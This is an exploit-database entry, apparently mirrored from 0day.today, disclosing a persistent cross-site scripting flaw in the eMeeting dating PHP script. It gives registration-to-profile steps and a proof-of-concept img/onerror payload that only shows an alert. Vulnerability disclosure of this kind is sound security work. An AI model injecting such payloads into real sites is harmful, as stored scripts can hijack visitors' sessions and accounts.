Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtSONiC1337DAY-ID-13679
HistoryAug 12, 2010 - 12:00 a.m.

eMeeting dating Persistent XSS

2010-08-1200:00:00
SONiC
0day.today
21
JSON

Exploit for php platform in category web applications

==============================
eMeeting dating Persistent XSS
==============================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ###################################               1
0                    I'm SONiC member from Inj3ct0r Team               1
1                    ###################################               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Webapp : eMeeting dating Persistent xss 
Vendor URL : http://datingscripts.co.uk/index.php

#######################################################################################################


Author : ..::[ SONiC ]::.. aka ~the_M4LW4r3~ <sonicdefence[at]gmail.com>

Special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,MA1201,D3aD F0x,Nishi,Bunny,CURS3D,SeeME

Greetz to :iNj3cT0r.com, www.andhrahackers.com

#######################################################################################################


Description : 

eMeeting dating software is everything you need to create an online PHP dataing solution. Supports automated signups, automated payments, live chat rooms and instant messaging, specific searching, integrated forums and photo galleries, and much more



###############################################################################################################

Exploit:

Step 1 : Register

Step 2 : Goto your profile

Step 3 : Insert your xss script in the profile area

Attack Pattern : <i><img src="/" onerror=alert('xss');

Step 4 : Now check your profile :)


###############################################################################################################

# ..::[ SONiC ]::.. aka the_M4LW4R3



#  0day.today [2018-01-02]  #
JSON